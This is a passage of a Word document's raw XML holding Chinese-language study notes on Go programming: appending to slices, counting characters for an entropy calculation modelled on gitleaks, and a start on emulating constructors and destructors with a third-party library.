      </w:r>
    </w:p>
    <w:p w14:paraId="2B464326" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看看空切片能往里面加吗</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418ACAF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var a []int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04994E7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    i:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08649BFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C090C0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>append(s,i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747DE1CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C5D53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10000;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A509B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        append(a,i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E71FBFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DCB1DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("%v",s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA0316B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("%v",a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294B04F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3CA9C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B492FE5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再次修改代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来需要将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的值赋给切片</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BF5BC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> s=append(s,i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6530B73C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F25FC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25501242" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD928B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC0445" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    s:=make([]int,2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C9458" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    var a []int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7613E688" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    i:=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FE544" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i=0;i&lt;10;i++{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B5743" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>s=append(s,i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219FA565" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        a=append(a,i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498D76E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D523A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    fmt.Println("s=%v a=%v",s,a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26986EE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3B397" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>达成目标而且可以看出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> s:=make([]int,2);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个就是一开始初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>角标都是初始化值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D849D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5685764B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917ED71" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> var name []type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>去声明一个空切片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>空切片也是可以往其中添加值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FCEBDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>​</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> s:=make([]int,2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>直接定义一个切片，并且给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这两个元素赋值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F1084C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D8405A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么往切片当中添加数据呢？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A297006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BB59EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s=append(s,i) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表示切片，并且已初始化的切片和空切片都可以往其中添加元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287547A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364A2C0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5688E7E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D3497ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc159779757"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集合中统计次数：例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算熵值统计字符串出现字符概率</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="45B53C3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map[rune]int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后类似</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字典，遍历并利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>++</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>统计数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D49B2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>charCounts := make(map[rune]int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51A47F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, char := range data {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0620A137" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>charCounts[char]++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD55EDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A56B14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35099E7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>invLength := 1.0 / float64(len(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D11A1B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>for _, count := range charCounts {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38759278" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>freq := float64(count) * invLength</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1180C6C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>entropy -= freq * math.Log2(freq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456C18C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4BD7FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAA3E0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1B98EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C656B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc159779758"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有构造函数和析构函数，通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/thecxx/jarvis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
    </w:p>
    <w:p w14:paraId="71F8D702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身没有构造函数和析构函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725D5A97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些说法认为析构函数的话，需要结合</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02693E3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A851C27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里通常使用第三方库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://github.com/thecxx/jarvis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95B8EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
